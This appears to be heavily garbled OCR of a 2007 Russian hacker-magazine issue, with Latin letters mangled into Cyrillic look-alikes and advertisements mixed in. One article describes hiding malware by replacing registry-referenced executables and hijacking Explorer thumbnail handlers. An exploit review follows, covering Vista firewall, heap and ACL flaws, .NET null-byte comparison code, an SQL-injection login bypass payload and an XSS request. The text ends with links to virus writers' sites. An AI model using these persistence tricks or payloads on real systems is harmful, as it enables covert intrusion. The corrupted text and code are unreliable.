В частности, панель Ѳоодіе хранит путь к файлу обновлений в ветке 
НКІ_\50ЕТѴѴАРЕ\ѲоодІе\Соттоп\6оодІе ІІрбаіег\раіЬ: СДРгодгат 
РІІе5\ѲоодІе\Соттоп\ѲоодІе ІІрсІаіег\6оодІеІІрсІаІег5егѵісе.ехе, 
позволяя нам заменять ОоодІеІІрбаІегЗегѵісе.ехе своей собственной 
программой, делающей все, что задумано, и передающей управление 
настоящей ЭоодІеІІрсІаІегЗегѵісе.ехе. И никто ничего не заподозрит, 
более того, отыскать внедренную таким образом малварь практически 
нереально! Для этого необходимо знать назначение всех ключей реес- 
тра, а это невозможно, поскольку существует бесчисленное множество 
программ с никем не стандартизированными настройками. 

Чисто теоретически можно периодически сканировать реестр на 
предмет изменений в ключах, содержащих «*.ехе» и «*.сШ», однако, 
во-первых, автору не известно ни одного готового сканера, который бы 
делал это, а во-вторых, даже если такой сканер и появится, он станет 
заложником большого количества ложных срабатываний. Например, 
стоит скопировать в ЕАР’е исполняемый файл из одной папки в другую, 
как его имя попадет в специальную ветку реестра, хранящую историю 
строки редактирования. Сканер, будучитупой машиной, не может 
отсеивать ложные срабатывания, и для полноценного анализа нам по- 
надобится человек, причем не просто человек, а весьма продвинутый 



Классы в ассоциациях 



При перехвате зарегистрированных расширений необходимо быть гото- 
вым к встрече со странностями. 

Странность первая (и легко преодолимая) — значение по умолчанию пе- 
рехватываемого расширения содержит пустую строку вместо ожидаемого 
типа файла. Если это та к, смотрим в подраздел ВЬеІІЕх и ищемтам длин- 
ную строку циферок (стандартный уникальный идентификатор). Напри- 
мер, в моем случае это Н КЕУ_СІА35Е8_РООТ\.ссІг\ВЬеІІЕх\{ВВ2Е61 7С- 
0920-1 1 сі 1 -9А0 В-00С04РС2 06С 1 }. 

Смотрим, какое значение по умолчанию содержит ветка {ВВ2Е61 7С- 
0920-1 1 01 -9А0В-00С04ЕС2О6С1}. Ага! Еще один идентификатор 

- {1 АЕВ1360-5АЕС-1 1 60-В806-00С04ЕО706ЕС}. Ищем его в реестре и... 
находим, черт возьми! Да ведьне возьмет! Емутакое добро ни даром, ни с 
доплатой не нужно. 

Оказывается, что за таинственным идентификатором прятался 
О ЕЕ-компонент« Извлечение миниатюр графических фильтров 
ОЛісе», название которого содержится в параметре {1АЕВ1360-5АЕС- 
1 1СІ0-В806-00С04ЕВ706ЕС} ключа по умолчанию. 

Спустившись на один уровень вглубь, мы откопаем ветку \Іпргос5егѵег32, 
параметр поумолчанию которой задет путь кдинамической библиотеке, 
используемой для отображения содержимого документов непосредс- 
твенно в проводнике, причем не только сбг-файлов, ной многих других, 
отображаемых при помощи С:\ѴѴІЫМТ\5у5Іепп32\іЬиітіЬѵ\л/.сіи. 

Ситуация проясняется. У автора сбг-файлы не ассоциированы ни с каким 
приложением (именно потому значение поумолчанию содержит пустую 
строку), однако установленный пакет М іеговой ОІІісе позволяет просмат- 
ривать их в виде миниатюр в проводнике. 

Какие преимущества это нам дает? А вот какие: можно нетолько подме- 
нять существующие обработчики чужих файлов, но и устанавливать свои 

— тогда при выделении данного файла в проводнике система попытается 
отобразить его миниатюру, вызвав нашудинамическую библиотеку. 
Ассоциациятипов при этом никакие изменится, и ни одна известная 
авторузащитная программа не сможет отследить этот эквилибристичес- 
кий трюк. 

Единственный минус такого решения втом, что он не работает, если 
пользователь предпочитаетжить в ЕАР’е или в командной строке, однако 
большинство потенциальныхжертв за пускает файлы исключительно из 
проводника, и даже преданные поклонники командной строки прибегают 
к нему время от времени. 

Странность вторая — значение поумолчанию пусто, как голова с бодуна, 
а подраздел\5ИеІІЕх отсутствует напрочь (ну или не содержит ниче- 
го интересного). Если так, открываемѴРегБІБІепіНапсІІег и, в случае 
успешного завершения операции, извлекаем егозначение поумолча- 
нию, которое может выглядеть, например, так: НКЕУ_СЕА55Е5_Р00Т\. 
бЬд\РегзІ5іепШапбІег\{0981 : 2470-Ьае0-1 1сб-Ь579-08002Ь30ЫеЬ}. 
Открываем НКЕУ_СЕА55Е5_РООТ\СЕ5Ю\{098Е2470-ВАЕ0-1 1 Сй- 
В579-08002В30ВЕЕВ}\Іпргос5егѵег32 и извлекаем оттуда имя динами- 
ческой библиотеки или очередной идентификатор (если онтам, конечно, 
есть) и поступаем с ним в соответствии с контекстом ситуации и нашей 
сексуальной ориентацией. Перехват динамических библиотек, реали- 
зующий 0І_Е/С0М/АсбѵеХ, — довольно сложная задача, и начинающим 
лучше не браться за ее решение — глюков не оберешься! Лучше выбрать 
другой тип расширений для перехвата, благо недостатка в них испыты- 
вать не приходится. 

Странность третья — значение поумолчанию не содержит ничего, и 
никаких подразделов не наблюдается. Это значит, что, несмотря на факт 
регистрации расширения, ему не сопоставлено никаких программ и не 
предусмотрено никаких специальных указаний для проводника (типа 
контекстного меню, миниатюр ит.д.). Такие расширения следует пропус- 
кать. 
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Докапываемся до обработчика 



пользователь, у которого малварь просто не водится. 

Другая теоретическая возможность — запрет на модификацию всех 
потенциально опасных ветвей реестра. Что ж, операционные системы 
семейства !\ІТ имеют гибкую политику доступа, но... полный запрет на 
запись в реестр приведет к развалу системы. Следовательно, нужнотща- 
тельно проанализировать все ключи, отделить опасные от безопасных и... 
идти топиться! Ведьвремени на это уйдет... Было бы просто замечатель- 
но, если бы разработчики программ думали головой и сразу сортировали 
свои настройки по степени потенциальной опасности, устанавливая им 
надлежащие права доступа. Так ведь нет! Они ленятся и валят все в кучу! 
А пользователи потом страдают, находясь под угрозой атаки! 

Впрочем, угроза атаки нетакуж и велика. Несмотря на то что реестр 
содержит просто клад ветвей, пригодных для внедрения, их автомати- 
зиро ванный поиск невозможен, поскольку, как уже говорилось, тупая 
машинанев состоянии определить назначение ключей по их содер- 
жимому. Это может сделать только человек! Следовательно, места для 
внедрения необходимо искать еще на этапе написания малвари. Но тут 
мы сталкиваемся стем, что многообразие используемых программ (и 
их версий] приводит к сужению круга потенциальных жертв. Впрочем, 
если брать широко распространенные программы (такие, например, 
как АбоЬе АсгоЬаІ Реабег), то кругокажется нетаким уж и узким. 

Вместо заключения 

Хакер отличается от нехакера прежде всего стремлением идти не- 
проторенным путем, искать новые решения, вместо использования 
давно известных и хорошо обкатанных. Хакерство — это творчество. 
Хакерство — это дерзость. И автор верит, что после прочтения этой 
статьи, исследовательского запала основательно прибавится, в 



результате чего кое-кому придется, схватившись за голову, в спешке 
совершенствовать защитные алгоритмы, потому что старые перестанут 
справляться с растущим потоком плодотворной софтвари. т 

Разоблачение перехвата налицо — такое заметит даже неопытный 
пользователь 




Вот л ишь один пример расширения со странностями 
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Продолжение леденящего душу хоррор-квеста 
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КРИС КАСПЕРСКИ 









Обзор 

ЭКСПЛОЙТОВ 



Еще не началась массовая миграция леммингов на Висту, а дыры в ней уже обнаружива- 
ются косяками. Наш сегодняшний обзор вновь посвящен этой операционной системе, 
которая, вопреки всем заверениям корпорации МісгозоЙ, намного более дырявая, чем 
предшествующая ей Хрюша. 
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Воттакая она, эта загадочная и неповторимая 
Виста, которую возможно создать лишь однажды 



Удаленный обход ѴѴіпсіоѵѵб 

РігеѵѵаІІІ 



Вгі еі 

Начиная с ХР в состав ѴѴІпбоѵѵз входит 
некая пародия на брандмауэр а-ля ѴѴІп- 
сіоѵѵб Рі геѵѵа II, блокирующая по умолчанию 
все локальные порты. Без существенных 
изменений она перекочевала в Висту. 

Атам, в Висте, сетевой стек полностью 
переписан, заточена поддержка ІРѵб с 
кучей тоннельных протоколов типа Тегебо, 
инкапсулирующих ІРѵб в ІРѵ4/ІЮР и 
высаживающих брандмауэры сторонних 
производителей на полную измену, 
поскольку, чтобы определить целевой 
ІР-адрес и порт назначения, необходимо 
раздербанить пакет, декодируя его с 
учетом формата Тегебо. О том, что Те- 
гебо представляет собой мощное орудие 
для пробивания уже существующих 
брандмауэров, всем специалистам и без 
того было известно. Но вот тот факт, что 
Тегебо, разработанный МісгозоД, обходит 
ѴѴІпбоѵѵБ Рі геѵѵа Ц, разработанный ей же, 
вызывал большой переполох — игнорируя 
настройки встроенного брандмауэра, 
хакеры получили возможность сканировать 
порты и устанавливать соединения с 
любыми сетевыми службами, используя 
штатные средства Висты. 

Тагдеіз 

Уязвимость затрагивает Місгозоб: ѴѴІпбоѵѵз 
ѴізФ Ьеіа 1/2, Ноте Вазіс/Ноте Ргетіит/ 
Визіпезз/Епіегргізе/Шітаіе, включая и 
х64-битные редакции. На ѴѴІпбоѵѵз 2000/ХР и 
5егѵег2003 эта угроза не распространяется. 

Ехріоіі 

Не требуется, для атаки достаточно восполь- 
зоваться любой утилитой, умеющей пере- 
давать и принимать ІРѵ4-пакеты (например, 
пеісаі). 

Боіиііоп 

Поскольку ІРѵб все еще не получил большого 
распространения, то для предотвращения 
вторжения протокол Тегебо рекомендуется 
отключить, например, путем блокирования 
ТСР-порта 5357 на внешнем брандмауэре. 




Внешний вид ѴѴІпбоѵѵз Рі геѵѵа II 



Удаленный обход защиты 
кучи от перепол ц ^ ц, * д Д|1 



Впеі 

Массовые переполнения кучи начались 
со статьи «Опсе ироп а ігее()...», 
опубликованной в августовском выпуске 
электронного журнала РНРАСКза 2001 год. 
Місгозо^ напряглась и встроила в ХР 5Р2 
защиту от переполнения кучи, значительно 
усиленную в Висте, пробить которую 
удалось лишь совместными усилиями 
целой плеяды выдающихся хакеров: ВгеІТ’а 
Мооге, Обеб'а НогоѵТг'а, МаФа Соппоѵег'а 
и нашего соотечественника Александра 
Сотирова. Сложность атаки объясняется 
тем, что Виста не только проверяет 
целостность служебных данных кучи (также 
называемых метаданными — теФбаЫ, но 
еще и шифрует их для надежности (кстати 
говоря, аналогичным образом поступает и 
библиотека дІІЬ для Ыпих и хВ50). Впрочем, 
ключ шифровки и контрольная сумма лежат 
рядом с подшефными метаданными, где 
они могут быть перезаписаны хакером. 
Достаточно «всего лишь» разобраться с 
форматом служебных данных. 

Тагдеіз 

Уязвимость затрагивает Місгозоіб ѴѴІпбоѵѵз 
Ѵізіа ЬеФ 1/2, Ноте Вазіс/Ноте Ргетіит/ 
Визіпезз/ЕпФгргізе/ШітаФ, включая и 
х64-битные редакции, а также ѴѴІпбоѵѵз 
2000/ХР/5егѵег 2003. 

ЕхрІОІІБ 

Для реализации атаки можно использовать 
библиотеку ІттІІЬ, созданную компанией 
ІттипТуіпс Іпс для своего же отладчика 
ІттипТуіпс ОеЬиддег. Фрагмент демонс- 
трационного скрипта, пробивающего защиту 
кучи от переполнения, смотри на диске. 

Боіиііоп 

Воспользоваться коммерческим програм- 
мным комплексом Ви^егЗЬІеІб ( ѵѵѵѵѵѵ.зуз- 
тападе.сот/зПюз/Р Ви^ЗЫб.ЫтІ І. 




» 




Внешний вид коммерческого отладчика 
Іттипііуіпс ОеЬиддег, подозрительно похожего на 
некоммерческий ОІІуОЬд 



Іокальная атака на АСІ/ы 



Вгіеі 

В июне 2007 года хакер по имени РоЬЬІе 
БоЫтап обратил внимание на «неаккурат- 
ную» установку в Висте прав, регламенти- 
рующих доступ к реестру и файловой систе- 
ме. В результате нее непривилегированные 
пользователи могут беспрепятственно 
читать закрома защищенных хранилищ, в 
которых, помимо прочих данных, находит- 
ся пароль администратора, а его захват 
приводит к известным последствиям. Хотя 
уязвимость носит локальный характер, 
ей могут пользоваться сетевые черви для 
повышения своих привилегий и установки 
руткитов, скрывая их от глаз антивирусных 
служб. Місго5о!і подсуетилась и выпус- 
тила заплатку, доступную через службу 
ѴѴІпбоѵѵз ІІрбаіе. Технические подробности 
содержатся в бюллетене безопасности под 
номером М507-032, из которого абсолютно 
невозможно ничего понять. То же самое 
относится и к прочим ресурсам по безопас- 
ности, например кЗесигТу Еосиз 
( уууууу.зесипМосиз.сот/Ыб/2441 1 1. ограни- 
чившемуся общими словами, но ничего не 
сказавшему по существу вопроса. Так что 
мне пришлось разбираться с проблемой 
самостоятельно. 



ТагдеІБ 

Уязвимость затрагивает М іеговой ѴѴІпбоѵѵз 
Ѵізіа ЬеФ 1/2, Ноте Вазіс/Ноте Ргетіит/ 
Визіпезз/Епіегргізе/ЫШтаІіе, включая и 
х64-битные редакции. На ѴѴІпбоѵѵз 2000/ХР и 
5егѵег2003 эта угроза не распространяется. 

ЕхрІОІІБ 

Нетребуется — атака реализуется штатными 
средствами доступа кфайловой системе и 
реестру. 

Боіиііоп 

Установить заплатку, которую можно полу- 
чить на узле ѴѴІпбоѵѵз ІІрбаіе. 
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ІКаскад дыр в М іеговой .МЕТ 2| 



Под влиянием агрессивной политики маркетингового отдела МісгозоЙ 
платформа .ЫЕТ продолжает свое неуклонное наступление на рынок, 
потеснив классический Си++ и некоторые другие языки (Ѵізиаі Вазіс, ^ѵа 
ит.д.). ЫЕТ-библиотеки поумолчанию входят во все ѴѴІпбоѵѵз-системы, 
начиная сХР (владельцам І\ІТ и ѴѴ2 К приходится их скачивать отдельно), а 
потому представляют собой весьма соблазнительную мишеньдля атаки, 
благо там есть, что атаковать. Сегодня мы рассмотрим как концептуальные 
уязвимости .ЫЕТ'а.так и отдельные ошибки реализации, устраняемые 
путем установки соответствующей заплатки. Поскольку .ЫЕТ представля- 
етсобой кросс-платформенную системно-независимую среду, абстра- 
гированную от конкретной архитектуры, то даже крошечная уязвимость 
автоматически распространяется на миллионы машин, работающих по 
всему миру: от серверов и рабочих станций до домашних компьютеров. 

Инъекция нулевых байт в текстовые строки 

Язык .ЫЕТ Соттоп Еапдиаде Рипііте (сокращенно .ЫЕТ СбР) поддержи- 
вает строки смешанного типа в МЕС-стиле, трактующие символ нуля как 
обычный символ. В то же самое время пабѵе-функции языка Си восприни- 
мают нулевой байт как завершитель строки, и потому при передаче СбР- 
строкфункциям №ііѵеСи) возникаетпротиворечие, подробноописанное в 
предыдущем обзоре эксплойтов. 

Но если в нормальных языках ответственность за некорректное преоб- 
разованиетипа целиком лежит на совести программиста, вызывающего 
функции внешних библиотекбез дополнительных проверок, то в случае 
с.ЫЕТ мы имеем грабли даже при использовании встроенных методов, 



разработчики которыхтаки не смогли определиться, какой строковый тип 
они должны поддерживать. 

Возьмем, например, метод Зігіпд. Сотраге, сравнивающий А5СІІ2-стро- 
ки, и сопоставим с оператором «=», сравнивающим СбР-строки, — налицо 
различие в поведении, наглядно демонстрируемое следующим 
А5Р-приложением: 

А5Р-ПРИЛ0ЖЕНИЕ, ДЕМОНСТРИРУЮЩЕЕ РАЗНИЦУ В ПОВЕДЕ- 
НИИ МЕТОДА 5ТРШ0.С0МРАРЕ И ОПЕРАТОРА «=» р СРАВНИВАЮ- 
ЩИХ ТЕКСТОВЫЕ СТРОКИ 

8иЬ Раде_Ьоасі ( ) 

сііт аііохѵесі, зЕігзбІбет, зЗесопсІІбет аз збгіпд 
зЕігзбІбет = Кедиезб ( " бігзб " ) 
зЗесопсІІбет = Кедиезб ( " зесопсГ' ) 

гезропзе .Мгібе (" Збгіпд . Сотраге — Еігзб ібет = " 

& зЕігзбІбет & "<Ьг>") 

гезропзе .Мгібе (" Збгіпд . Сотраге — Зесопсі ібет = " 

& зЗесопсІІбет & "<Ьг>" ) 

іб Збгіпд . Сотраге ( зЕігзбІбет, зЗесопсІІбет) =0 бЬеп 
гезропзе .ЭДгібе («Збгіпд . Сотраге :МабсЪ.есІ! 

Збгз'ге бііе зате"&"<Ьг>" ) 

еізе 

гезропзе . Шг ібе ( " Збгіпд . Сотраге : РАІЬЕБ ! 

Збгз'ге поб бЪ. езате"&"<Ьг>" ) 

Епй Іб 
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<онференция по безопасности платформы .ЫЕТ в Бостоне 
— одна из многих 



ІР зЕігзРІРет=з8есопс1ІРет РЬеп 

гезропзе . МгіРе (" БігесР еѵаі — МаРсЪесП 
ЗРгіпдз аге РЪе зате" & " <Ьг>") 

еізе 

гезропзе .ШгіРе ( " БігесР еѵаі — РАІЬЕБ! 

ЗРгіпдз аге пор Рііе зате" & "<Ьг>") 

Епй II 
Епсі ЗиЬ 

Если передать приложению две полностью идентичных строки 
«Іезі» («зітіпд. сотраге. бегло. аврТбгзЫезІі&весопсМезЫ, оно 
выдаст вполне ожидаемый и совершенно законный результат: 

РЕЗУЛЬТАТ СРАВНЕНИЯ СТРОКИ «ТЕ5Т» СО СТРОКОЙ «ТЕ5Т» 
МЕТОДОМ 5ТРШ0.С0МРАРЕ И ОПЕРАТОРОМ «=» 

ЗРгіпд . Сотраге — ЕігзР ІРет = РезР 

ЗРгіпд . Сотраге — Зесопсі ІРет = РезР 

ЗРгіпд . Сотраге — МаРсЪесІ! ЗРгіпдз аге РЬе зате 

БігесР Еѵаі — МаРсЪесІ! ЗРгіпдз аге РЪе зате 

Но вотпри передаче строк, включающих символ нуля (например, 
«5Ігіпд.сотраге.сІето.а5р?Лг5і=іе5І%00&5есопсІ=іе5І»), ситуация 
кардинально изменится. Оператор «=» покажет различие, а метод 
Зігіпд. Сотраге — нет: 

РЕЗУЛЬТАТ СРАВНЕНИЯ СТРОКИ «ТЕ5Т%00» СО СТРОКОЙ 
«ТЕ5Т» МЕТОДОМ 5ТКШ0.С0МРАКЕ И ОПЕРАТОРОМ «=» 

ЗРгіпд . Сотраге — ЕігзР іРет = РезР? 

ЗРгіпд . Сотраге — Зесопсі ІРет = РезР 

ЗРгіпд . Сотраге — МаРсЪесІ! ЗРгіпдз аге РЬе зате 

БігесР Еѵаі — Еаііесі! ЗРгіпдз аге пор РЪе зате 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



И ИНТЕРНЕТ 



Специальное предложение: 

ТСПСАПН ИНТЕРНЕТ 

I ПСЦКЛіОЧСНИГ БіСППАПШ 



- Подключение - б любом ы&ете 

МИЫІЫЬІ И М г^г; К.4.Т и-сксчп ибл. 

* Срои. ПОДКЛЮЧЕНИЯ Б М ОС КБ Ѳ - 14 ДНеЙ, 
іі Гй ос кс некой об л. — от 14 до 30 дней. 

■ Установка прямого московского телефон но-г о номера 

1 Многоканальные телефонные номера 

- ІР-телефоння 

4 выделенные линии Интернет 
■ Корпорл тимнмс частные сс-гм (ѴРІІ) 

■ Ко о і н п і . у си у і и -б-н I м-у-ен і ра 



РІИ Телеком 
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■ ициальный сайт компании РгоСЬескЕІр 




Ролик, демонстрирующийтехникуБОБ-вп рыска наУоиТиЬе: 
ѵѵѵѵѵѵ.уоиіиЬе.сопп/ѵѵа1сЬ?ѵ=М^N^^И4^0РУ 



Помимо Бігіпд.Сотраге, подобной болезнью страдаютБегѵег.МарРаіб, 
БуБіет.МеБМаіЕБтірМаіЕБепсІ, Бегѵег.ЕхесіЕе, Бегѵег.ТгапБІюг и мно- 
гие другие методы. Проблема затрагивает Місгобо^ .ЫЕТ Егатеѵѵогк 
1 .0, Егатеѵѵогк 1 .0 5Р1/5Р2/5РЗ, Егатеѵѵогк 1.1, Егатеѵѵогк 1.1 5Р1 и 
Егатеѵѵогк 2.0. Для ее устранения Місгобо^ выпустила пару заплаток 
КВ928365 (для Егатеѵѵогк 2.0) и КВ928366 (для .МЕТ Егатеѵѵогк 1.1), одна- 
ко ихустановка приводит к изменению поведения встроенных методов и 
в ряде случаев к развалу ранее написанных приложений, которыетакже 
приходится обновлять. 

Множественные переполнения буфера в ЛТ-компиляторе 

Платформа .ЫЕТ (как и Заѵа) представляетсобой интерпретатор 
байт-кода, заметноуступающий в быстродействии «чистым» Си-ком- 
пиляторам. Поэтому для сокращения разрыва в производительности 
используется техника компиляции байт-кода в память, за что отвечает 
ЛТ-компилятор. Сгенерированный им код работает в обход виртуаль- 
ной машины, игнорируя многочисленные проверки, что отнюдь не идет 
на пользу безопасности. Ни одной фирметаки неудалось реализовать 
ЛТ-компилятор для языка ^аѵа | полностью свободный отошибокдак 
что платформа .ЫЕТ в этом смысле не исключение. Механизмы, обеспе- 
чивающиезащиту буферов от переполнения, ориентированы главным 
образом на виртуальную машину, обрабатывающую байт-код, и отсутству- 
ют в машинной коде, сгенерированном ЛТ-ком пил ятором (смотри статью 
в Википедии: ЬЛрУ/еп.ѵѵікіресІіа.огд/ѵѵікі/ЗивЫп-Ііте сотрііабоп ). 
Болеетого, ЛТ-компилятор также является весьма соблазнительным 
объектом для атаки, поскольку содержит множество ошибок переполне- 
ния, обнаруженных исследователем по имени Зегоеп Егіфегз из ком- 
пании БитаЛа. Оказалось, что ЛТ-компилятор всецело полагается на 
обрабатываемый им байт-код, наивно рассчитывая нато, что он никем не 
изменен после трансляции. В Заѵа, по крайней мере, имеется верифика- 
тор, тщательно проверяющий байт-код на соответствие спецификациям... 
Для реализации БоБ-атаки достаточно подать на вход ЛТ-компилятора 
слегка подпорченный файл с байт-кодом. Также возможен и удаленный 
захватуправления, во всяком случаетеоретически. Практически для 
этого потребуется обойти многочисленные защиты, предотвращающие 
выполнение машинного кода в неисполняемых областях памяти. Вживой 



природе подобные эксплойты отсутствуют. А жаль! Ведь дыре подвержены 
практически все операционные системы линейки N1: от\/Ѵ2Кдо Висты. 

И хотя Місгозоііуже выпустила соответствующие пакеты обновлений: 
ѵѵѵѵѵѵ.тісго5оЛ.сот/боѵѵп[оаб5/бе1:аі[5.а5рх?Еаті[ѵИ=ВАЗСЕВ78- 
8Е1 В-4С38-АРЕР-Е8ВС95АЕ548Р (для ѴѴІпсіоѵѵб 2000 ) и ѵѵѵѵѵѵ.тісгоБОІ'Е 
сот/боѵуп[оаб5/бе1аі[5.а5рх?Баті1-уІсІ=СВС9БЗСБ-СЗСЗ -45С4- 
82ЕЗ-Е1 1398ВС2СР2 (для Висты), далеко не все пользователи позаботи- 
лисьоб ихустановке, и количество потенциальныхжертв просто огромно. 
Дополнительныетехнические подробности можно найти в бюллетене 
безопасности МБ07-040 от МісгобоіЛ ѵѵѵѵѵѵ.тісгоБО^.сотЛесИпеі/БесигіІѵ/ 
ВиІІе1:іп/М507-040.т5рх . а также на Бесигку Босиз’е: ѵѵѵѵѵѵ.БесигіМосиБ. 
сот/Ьіб/2481 1 . 

Собственно говоря, РЕ-формат представляетсобой весьма продвинутый 
контейнер для различных типов данных, и, чтобы не плодить сущности, 
Місгобо^і (в целяхунификации) решила воспользоваться уже готовыми 
наработками, доверив это дело пионерам, допустившим в парсере РЕ- 
формата кучу ошибок. Причем среди них есть и фатальные — приводящие 
к переполнению с возможностью передачи управления на машинный код, 
что влечет за собой захватуправления системой. И хотя угрозе присвоен 
статус «критической» (и она воздействует на все системы линейки ЫТ, 
включая Висту), спешить сустановкой заплаток нет никакой нужды — если 
ухакера есть возможность передатьжертве исполняемый файл, который 
она запустит, то захватуправления будет обеспечен и без переполнения. 
Исключение составляет, пожалуй, лишь СБР-код, передаваемый браузеру 
на выполнение. Тогда, чтобы подкинутьжертветрояна (или установить 
Ьаскбоог), достаточно заманить ее на специальным образом сконструиро- 
ванную ѵѵеЬ-страничку. 

Подробнее об этой дыре можно прочитать на Бесигііу Еосиз’е: 
ѵѵѵѵѵѵ.5есигі1:ѵ1 : оси5.сот/ЫсІ/24778 . 

Многочисленные ошибки фильтрации 
и 5С!І_/НТМІ_-инъекции 

Техника БОБ/НТМЕ-инъекций отработана уже давно и вполне успешно. До- 
пустим, при входе на некий сайт пользователь вводитсвое имя и пароль, 
которые ѵѵеЬ-скрипт сравнивает с эталонными данными, извлеченными из 
базы. Взаимодействие с ней можетбытьорганизовано, например, так: 



► 050 



ХАКЕР 08 /104/ 07 







и= 



Г 

к 



^ Л 3 дп— 









Чміі -"■■ІІЧ.І-И^ г Щ"І іч.іИ-ігЛ 1 

Ѵцііі '■■ЦІ.ГЦ ■ ІЧИЧРІІІЛ ! 1 гЛ 
Л’ЛІС.І < ' > ІІЧІЛ г - 1 1 и. І.лГ 3*Г ІИ- шх Мы- ■■№ 
|.1ір:1 Ё> 4 -.р»к.Г Кэиі^р л ш 4 И» іл.і. 



Демонстрация уязвимости в .ЫЕТ’е 



Т 



$гези1к = тузд1_с!Ъ_диегу ( 

"йаСаЬазе" , 

"зеіеск * Ігот изегТаЫе ткЬеге Іодіп = ' $изегЕодіп' 
апсі раззтлгогсі = ' $изегРаззтлгогс1 1 " ) ; 

Здесь $изегІодіп — переменная с именем пользователя, а 
$изегРа55\л/огс1 — пароль, подставляемый в строку БОБ-запроса. 

Если втеле имени или пароля присутствует парная закрывающая 
кавычка, то его остаток интерпретируется как последовательность 
БОБ-команд. Посмотрим, что произойдет, если вместо пароля ввести 
строку « ^ и с к ' ог Т= '1 ». А произойдет при этом следующее. Базе 
данных будет послан запрос «зеіесі * ітот изегТаЫе ѵѵЬеге Іодіп = 
'КРЫС' апб развѵѵогб = Чшск' ог Т = Т», в результате чего кавычка, 
стоящая после Іиск’а, закроет пользовательский пароль, а остаток 
строки превратится в логическое выражение, обрабатываемое 
базой данных. Поскольку оченьтрудно представить себе ситуацию, 
при которой один не был бы равен одному, выражение всегда будет 
истинным вне зависимости от введенного пароля, в результате чего 
хакер сможетзайти на сайт под именем другого пользователя со 
всеми вытекающими отсюда последствиями. 

Для предотвращения БОБ/НТМБ-инъекций необходимо осущест- 
влять фильтрацию всего пользовательского ввода на предмет 
наличия недопустимых символов, но разработчики ѵѵеЬ- приложе- 
ний — люди ленивые, фильтрацию они реализуют кое-как, спустя 
рукава. Поэтому средства автоматической фильтрации, встроенные 
в платформу . N ЕТ, оказались большим подарком и завоевали всеоб- 
щую любовь и популярность. Междутем качество автоматического 
фильтра оста вляетжелать лучшего; он содержит множество ошибок, 
затрагивающих втом числе и МісгозоИ .ЫЕТ Егатеѵѵогк 2.0, входя- 
щий в состав «неуязвимой» Висты. 

В частности, компания РгоСЬескЦр [ ЬНрУ/ргосЬескир.сот ] обнаружи- 
ла весьма солидный багв системеуправления контентом (.ЫЕТ Сопіепі 
МападетепіБузіет, или сокращенно .ЫЕТ СМ5), допускающий под- 
становку .ЫЕТ-скриптов в поле Іапд стандартного приложения Іодоп. 
азрх, выполняемого в контексте уязвимого ѵѵеЬ-сайта, что позволяет 
реализовать атакутипа СгоззБИюБспрбпд путем отправки следующего 
ѲЕТ-запроса: 

ѲЕТ-ЗАПРОС К І_0е0М.А5РХ р ПОДСТАВЛЯЮЩИЙ .ИЕТ-СКРИПТ 
ВПОЛЕІ_АЫе 

СЕТ /Іодоп. азрх?1апд=<ЗСКІРТ>а1егР ( 1 Сап%2 0Сгозз%2 03 
іСе%2 ОАССаск 1 )</ЗСКІРТ> НТТР/1.1 
НозС: ехатріе . ІюзС . со .ик 

Соокіе : АЗШЕО= . . . ; АЗР . ЫЕТ_ЗеззіопІс1= . . . ;СЫВООК=. . . ; 
АЗРЗЕЗЗІ0ЖВЗСВА0ТЗТ= . . . 

Кеіегег : ІЩрр : / /ехатріе . козк . со . ик : 80/епѵігоп . рі 
ІІзег-АдепС: Мо2І11а/4.0 (сотракіЫе;МЗІЕ 5 . 5 ;Мпс1омз 
Ж 5 . 0 ; Т3124 61 ; . ЫЕТ СЬР 1.0.3705) 

Соппескіоп: сіозе ІЗС 



ВЕХШ 0 Ш 1 

нрАіішмін ііркпагані .х ш вас і . іі.дуюіі|иі: и. 

^ КОСТИНГ 

I V \сн:і ииг] 

Планы Щ Параис-гры ] Іілна 

Віііппйг 1ГЙ ОпЙЙрѵ* 

В-акіс ІГй. а сайги ѣ МѴ®Ш. Оі 34В- руб 

ВіНІПНІ Рга УГБ 1Гягіг« Си 52? Егр-б 

Со всеми планами п алеть уіір амсн^ПЗДтшцдн- 

I ВИРТУАЛЬНЫЕ 

ВЫДЕЛЕННЫЕ СЕРВЕРЫ: 




Планы 


Пзр-зматрь- 


Цена 


ВШІ 


2ГБ. ГЦвфп 


■:;п Лі>] і^-С. I 


Зіипсізгі 


ЗГБ і?тп ДАМ 4\Нц 


Оп Ш-р-^4 


Ё-імІпгаа 


1СГЙ. 1 ЦАН В ЙСЬ Ч :*4ит 


Оі КВ-р^Б і 


вНІППІ 1"№ 


95ГБ, іѵш&т. 


Оі 'ЗСІ руБ.І 



.і4нріі,ішііі.мию уш ггролаія^і 

ІІ.ІЛО.ІІ. уіір;ііІ.;:. І ІИХ І^І 1 ! МЛкХ^Г > ІЧ) рѵгТ ЧеМІ 



* Д ія П.1ИИ.М ■■Іх іугтдша и ріііыщі 

г "кы/ы". і**і сіт ім* лЛс п-т-вд ^ «««лк»: 

|||1ІЙ ѵтс. іКН ІКЯ І0%; 
ік§ііьиіі:ш|? ш I го.] и КН.ПКЯ1 20*4 



Ні-і- іісчіы 
іцкг_івпч_ьмі а 

НДС 



} РЕГИСТРАЦИЯ ДОМЕНОВ 



'3 и рсі іі (.ч р :і іі и ю діім ізиін 

.сот р .пеі, .Ьіг, огд : 

тчч [■ ЛЧК |з ч й_'’і із ■. нк.іпгин 1 1 . К 

Реі нсярирусм кочены ь № юнал: 
гу іг>Го ж уу уд ут у; № Ьіі.рІ Ы си 
со.ик сот.&д гёе Гт деп.т дь іп ю \р Іа 
глй те.ик те пи рі зс зе зіі 1с ѵд ѵув 



I ВАКАНСИИ 



- Системный администратор 

- Помощник оисздминз г 

техподдержка 

- Веб прогрймист. 



Выѵ игяр лріТДііті. 

ѵорѵтш ЙО|ПЛ0НР 1410, 

система бонусов 
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О КАКИЕ ЗАБУГОРНЫЕ САЙТЫ/БЛОГИ РАЗЛИЧНЫХ ПРЕДСТА- 
ВИТЕЛЕЙ БЕСиШТУ/НАСКІЫС/ѴХ ПОСОВЕТУЕШЬ ПОЧИТАТЬ? 

Ну, это вопрос скорее в «Сцену». О некоторых личностях и их сайтах в 
журнале уже писалось, ялишьнапомнюонихи добавлю парочку 
из своего списка ссылок в браузере: 

Шр://сѵпеох.пеІ — на этой странице хранятся проги, вирусы и статьи от 
человека с ником Супеох. 

ШрѴ/зріІі.І'юзКзк — вирусы от 19-летнего вирусмейкера из Австрии, авто- 
ра статей для езинов 29А, сосіегг.пеі, гРІГ, ВАТсН Еопе, СЬгізітаз 
